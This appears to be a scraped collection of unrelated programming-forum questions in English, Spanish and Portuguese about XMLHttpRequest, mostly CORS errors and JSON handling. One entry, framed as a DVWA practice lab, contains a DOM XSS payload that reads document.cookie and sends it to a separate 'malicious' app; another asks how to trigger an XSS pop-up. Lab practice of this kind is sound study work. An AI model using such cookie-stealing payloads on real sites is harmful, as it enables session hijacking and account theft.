XSS payload for XMLHttpRequest()

The source code says as below:

<script>        function doSearch(item) {                           url = 'https://api.mywebsite.com/search'         var xmlHttp = new XMLHttpRequest();         xmlHttp.onreadystatechange = function() {            if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {             response = JSON.parse(xmlHttp.responseText);             populateTable(response);           }           else if (xmlHttp.readyState == 4 && xmlHttp.status != 200) {             console.log(xmlHttp.responseText);           }         }         xmlHttp.open('POST', url, true);          xmlHttp.setRequestHeader('Content-Type', 'application/json; charset=UTF-8');         xmlHttp.setRequestHeader('Accept', 'application/json');         data = {'searchTerm':item}         xmlHttp.send(JSON.stringify(data));                }              var mockResponse = {         "response" :           [             {               "breed" : "german sheperd",               "intelligence" : 3             },             {               "breed" : "labrador retriever",               "intelligence" : 7             }           ]       }              function populateTable(response) {                  document.getElementById('theTable').innerHTML = '';                  responseData = response['response'];                  for (i = 0; i < responseData.length; i++) {           tr = document.createElement('tr');           td1 = document.createElement('td');           td1.setAttribute('class', 'column1');           td1.innerText = responseData[i]['breed'];           tr.appendChild(td1);           td2 = document.createElement('td');           td2.setAttribute('class', 'column2');           td2.innerText = responseData[i]['intelligence'];           tr.appendChild(td2);           document.getElementById('theTable').appendChild(tr);         }                  }        </script> 

Any way I can achieve XSS with a pop up??

XMLHttpRequest cannot load “” due to access control checks en iOS

Estoy recibiendo el siguiente error al consumir una api externa.

[Error] XMLHttpRequest cannot load “URL” due to access control checks.

La solicitud es un simple POST con autorización y content-type, sin embargo no logro obtener la respuesta.

Los demás servicios que consumimos en la aplicación funcionan correctamente. Cómo se puede solucionar este problema?

Mi proyecto usa Ionic 3 con WebView 2.5.1. Este error solo pasa con dispositivos iOS, en cambio con Android el servicio funciona correctamente.

Error usando Angular.js – Node.js : Access to XMLHttpRequest at ‘.. ‘has been blocked by CORS policy: No ‘Access-Control-Allow-Origin’

soy nuevo aprendiendo este stack MEAN, espero puedan ayudarme, llevo dias con esto y la verdad no puedo dormir bien por pensar tanto 🙁 .

Logre hacer una peticion get al sitio de JSON (https://jsonplaceholder.typicode.com/posts) y si me devolvio un JSON.

Pero tambien estoy intentando acceder a esta direccion (http://aplicaciones007.jne.gob.pe/srop_publico/Consulta/Afiliado/GetNombresCiudadano?DNI=47099414 ) y ya de por si le estoy agregando un parámetro que solicita, y en la web me devuelve datos(Un nombre y apellido). Pero cuando lo llamo desde angular me tira este error :

Access to XMLHttpRequest at ‘http://aplicaciones007.jne.gob.pe/srop_publico/Consulta/Afiliado/GetNombresCiudadano?DNI=47099414’ from origin ‘http://localhost:4200’ has been blocked by CORS policy: No ‘Access-Control-Allow-Origin’ header is present on the requested resource.


core.js:15724 ERROR HttpErrorResponse {headers: HttpHeaders, status: 0, statusText: “Unknown Error”, url: “http://aplicaciones007.jne.gob.pe/srop_publico/Consulta/Afiliado/GetNombresCiudadano?DNI=47099414”, ok: false, …} error: ProgressEvent {isTrusted: true, lengthComputable: false, loaded: 0, total: 0, type: “error”, …} headers: HttpHeaders {normalizedNames: Map(0), lazyUpdate: null, headers: Map(0)} message: “Http failure response for http://aplicaciones007.jne.gob.pe/srop_publico/Consulta/Afiliado/GetNombresCiudadano?DNI=47099414: 0 Unknown Error” name: “HttpErrorResponse” ok: false status: 0 statusText: “Unknown Error” url: “http://aplicaciones007.jne.gob.pe/srop_publico/Consulta/Afiliado/GetNombresCiudadano?DNI=47099414” proto: HttpResponseBase


El codigo de mi servicio es :

 import { Injectable } from '@angular/core'; import {HttpClient}from '@angular/common/http' import { Persona } from '../modelos/persona';  @Injectable({   providedIn: 'root', }) export class PersonaService {    selectedPersona: Persona;   personas:Persona[];   readonly URL_API='http://localhost:3000/Inicio/Persona';   readonly URL_API_RENIEC='http://aplicaciones007.jne.gob.pe/srop_publico/Consulta/Afiliado/GetNombresCiudadano?DNI=47099414';   readonly URL_API_JSON='https://jsonplaceholder.typicode.com/posts';    constructor(private http: HttpClient) {      this.selectedPersona=new Persona();   }    getDataJson(){     return this.http.get(this.URL_API_JSON)   }    getDniPersona(){     return this.http.get(this.URL_API_RENIEC)   }  }  

Y en mi componente ts :

ngOnInit() {      this.personaService.getDataJson() //Obtener los datos de "https://jsonplaceholder.typicode.com/posts"     .subscribe(datos=>{       console.log(datos);     });       this.personaService.getDniPersona() //Obtener los datos de "aplicaciones007.jne.gob.pe/srop_publico/Consulta/Afiliado/GetNombresCiudadano?DNI=47099414"     .subscribe(datos=>{       console.log(datos);     }); } 

Por favor ayúdenme, gracias de antemano.

Llamadas XMLHttpRequest a variables JSON específicas creadas en PHP

Tengo esta llamada XMLHttpRequest que me carga una variable JSON en array desde un PHP, funciona pero cuando hay dos variables distintas creo que el script no sabe cuál coger (JSON.parse(this.responseText)):

 $  (document).ready(function (){   var xmlhttpTipagos = new XMLHttpRequest();   xmlhttpTipagos.onreadystatechange = function() {   if (this.readyState == 4 && this.status == 200) {     var objetoTipagos = JSON.parse(this.responseText);           var out = "";     var i;                var myVar = 1;     for(i = 0; i < objetoTipagos.length; i++) {         a = myVar++;         out += '<li>' + objetoTipagos[i].nombre_tipago + '</li>';     }            document.getElementById("nombre_tipago").innerHTML = out;   } }; xmlhttpTipagos.open("GET", ruta+"obtenresultado.worker.php", true); xmlhttpTipagos.send(); }) 

Mis variables están en el mismo archivo PHP y ofrecen resultados diferentes. Si uso dos llamadas XMLHttpRequest distintas que tiran de archivos PHP distintos me funciona bien. Hay alguna manera de llamar específicamente a una variable? Algo como JSON.parse(arrayTipagoJSON ) y JSON.parse(arrayIdiomasJSON), mi intención es recoger todos los arrays del mismo PHP (obtenresultado.worker.php) sin tener que crear un archivo por cada una.

Los arreglos los encodeo así una vez obtenidos

  $  arrayTipagoJSON = json_encode($  arrayTipago);   $  arrayIdiomasJSON = json_encode($  arrayIdiomas); 

DVWA DOM XSS exploit using XMLHTTPRequest

I need you help to complete this practice session of mine. I have xampp and two app : dvwa and a “fake malicious” app called dvwaexploit

When I visit the malicious app, I want to execute a DOM XSS located in dvwa to steal cookie. But the code does not work as expected.

Any advice will be welcome. Here is the script in the fake malicious web site

<script>   var payload = "<script> " +                " var req = new XMLHttpRequest(); " +                " var stolen_cookies = JSON.stringify({ 'data': document.cookie});" +                " req.open('GET','http://127.0.0.1:8081/dvwaexploit/domxssbackend.php?data=' + stolen_cookies, true); " +                " req.setRequestHeader('Content-Type', 'application/json;charset=UTF-8'); " +                " req.send(JSON.stringify({ 'data': document.cookie})); " +                "</scr"+"ipt> ";   var req = new XMLHttpRequest();  req.open('GET',"http://127.0.0.1:8081/dvwa/vulnerabilities/xss_d/?defaul=" + payload);  req.send(); </script> 

Recoger un array JSON en un HTML procedente de PHP y mostrarlo en XMLHttpRequest

Estoy intentando recoger un bucle de PHP en una función XMLHttpRequest para mostrar un listado en un HTML.

$  resulTiposTienda = ClaseTiposTienda::obtenerBucleTiposTienda(); $  bucle_TiposTienda = $  resulTiposTienda[0]; $  contadorTiposTienda = count($  bucle_TiposTienda); foreach($  bucle_TiposTienda as $  itemTiposTienda):   $  myArr = array($  itemTiposTienda['id_tipotienda'], $  itemTiposTienda['nombre_tipotienda']);        $  myJSON = json_encode($  myArr);   echo $  myJSON; endforeach; 

El resultado que obtengo es el siguiente:

["38501","Cosm\u00e9tica"]["38502","Calzado"]["38503","Textil"]["38504","Inform\u00e1tica"]["38505","Servicios"]["38506","Alimentaci\u00f3n"]["38507","Er\u00f3tica"]["38508","Artesan\u00eda"]["38509","Deporte"]["38510","Papeler\u00eda"]["38511","Arte"]["38512","Electrodom\u00e9sticos"]["38513","General"]["38514","M\u00fasica"]["38515","Herbolario"]["38516","Segunda mano"]["38517","Art\u00edculos Mascotas"]["38518","Mobiliario"]["38519","Automoci\u00f3n"]["38520","Regalos"] 

Intento recoger ese resultado para mostrarlo en el div id

<div id="id_tipotienda"></div> 

usando XMLHttpRequest y no me devuelve nada en la página.

var xmlhttp = new XMLHttpRequest(); xmlhttp.onreadystatechange = function() {   if (this.readyState == 4 && this.status == 200) {     var myObj = JSON.parse(this.responseText);     document.getElementById("id_tipotienda").innerHTML = myObj;   } }; xmlhttp.open("GET", "obtenerdatos.php", true); 

Uso el document ready, la libreria jquery correctamente, etc… alguien sabría encontrar el/los fallos?

Uso do objeto XMLHttpRequest para realizar uma requisição HTTP assíncrona para atualizar dados no servidor sem atualização completa da página web

Possuo conhecimentos básicos e estou utilizando na aplicação: html/css, javascript, Nodejs, e para o banco – Mongodb – Mongoose.

Minha aplicação é bem simples, como podem ver na imagem abaixo, serve para publicação de textos contendo título e conteúdo. Preciso que assim que um novo conteúdo seja postado ele apareça logo abaixo, na lista de post, porém sem a atualização completa da página. Aceito referências ou videos explicando como fazer.

inserir a descrição da imagem aqui

Segue abaixo o código javascript que tenho até agora.

// Publicar conteúdos   app.get('/home', function(req, res, next){     Postagem.find().sort({date:'desc'}).then(function (posts) {       res.render('home', {posts: posts})//FORMULARIO HTML     })   })  // Recebendo os posts    app.post('/home/postagens', function(req, res, next){   var errosPostagem = []   // Validação da postagem    if(!req.body.titulo || typeof req.body.titulo == undefined || req.body.titulo == null ){       errosPostagem.push({texto: "Título inválido "})   }   if(!req.body.conteudo || typeof req.body.conteudo == undefined || req.body.conteudo == null ){       errosPostagem.push({texto: "Conteudo invalido "})   }       if(errosPostagem.length > 0){         res.send('Título ou conteúdo inválido')       }else {             const novaPostagem = {             titulo: req.body.titulo,             conteudo: req.body.conteudo,             date: req.body.date             }             new Postagem(novaPostagem).save().then(function(){             }).catch(function (erro){               res.send("Houve um erro: "+error)             })       }   }) 

Access-Control-Allow-Origin erro com XMLHttpRequest()

Olá, estou tendo o seguindo erro:

No ‘Access-Control-Allow-Origin’ header is present on the requested resource.

Já pesquisei e a solução que encontro é de adicionar:

        request.setRequestHeader('Access-Control-Allow-Origin', '*'); 

Porém, mesmo assim o erro persiste. Se eu executar a aplicação com o Cors desligado, funciona normalmente. Alguém pode me ajudar?

var request = new XMLHttpRequest();      request.open('GET', 'https://www.URLAPI.com/api/v3/PARAMETRO);      request.setRequestHeader('Access-Control-Allow-Origin', '*');     request.setRequestHeader('Access-Control-Allow-Methods', 'GET, POST, OPTIONS, PUT, PATCH, DELETE');     request.setRequestHeader('Access-Control-Allow-Headers', 'Access-Control-Allow-Headers, Origin,Accept, X-Requested-With, Content-Type, Access-Control-Request-Method, Access-Control-Request-Headers');      request.setRequestHeader('Content-Type', 'application/json'); //Obrigatorio API     request.setRequestHeader('access_token', 'MEUTOKEN'); //Obrigatorio API      request.onreadystatechange = function () {         if (this.readyState === 4) {             if(request.status === 200){             console.log('Status:', this.status);             console.log('Headers:', this.getAllResponseHeaders());             console.log('Body:', this.responseText);                                  console.log(request);              }else{                 console.log("Erro");                 console.log(request);             }         }     };      request.send();  

Projeto Angular 7 (WEB). Só consigo acessar o dado que preciso quando executo o chrome com o CORS desativado.

"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --disable-web-security --disable-gpu --user-data-dir=~/chromeTemp 

Can we make links loaded by XMLHttpRequest crawled by search engines?

My objective is to build a sort of web-calendar which display links to sport events. The first idea that I got, and the one which seemed more logical to me, is loading the calendar months by Ajax requests. The issue is that some articles mention that these links might not be taken into account by search engines spiders.

This article mention that “Note that as of now, Google and Bing can index synchronous JavaScript applications just fine. Synchronous being the key word there. If your app starts with a loading spinner, then fetches content via Ajax, the crawler will not wait for you to finish. This means if you have content fetched asynchronously on pages where SEO is important, SSR might be necessary.”

So, at todays date, is that still true? And if so, is it possible to tell search engines somehow which pages to crawl next from a VUE app?

In other words, any news regarding this post?

Access to XMLHttpRequest has been blocked by CORS policy

Tenho duas aplicações Flask sendo executadas localmente na minha máquina. Uma está rodando na porta 5000 e a outra na porta 5050. Eu preciso fazer uma chamada da aplicação 5000 para a 5050. Porém estou tendo este problema:

Access to XMLHttpRequest at 'http://localhost:5050/run' from origin 'http://127.0.0.1:5000' has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource. 

A chamada até ocorre na aplicação rodando na porta 5050, porém os dados não são passados e acaba dando um INTERNAL SERVER ERROR na aplicação 5050.

Este é o código que faz a chamada:

$  .post('http://localhost:5050/run', {   id: 'test',   command: 'echo michael' }, function (data) {   console.log(data) }); 

Já pesquisei sobre esse erro no google e até mesmo no próprio stack overflow, mas nenhuma das soluções funcionou para mim.

Seguem alguns links que pesquisei:

  1. https://stackoverflow.com/questions/20035101/why-does-my-javascript-get-a-no-access-control-allow-origin-header-is-present
  2. No 'Access-Control-Allow-Origin' header is present on the requested resource. Origin 'null' is therefore not allowed access. – Phonegap
  3. https://flask-cors.readthedocs.io/en/latest/
  4. https://stackoverflow.com/questions/30717152/python-flask-how-to-set-response-header-for-all-responses

Obs: Não quero ter que usar nenhuma extensão e nem executar o navegador com alguma flag!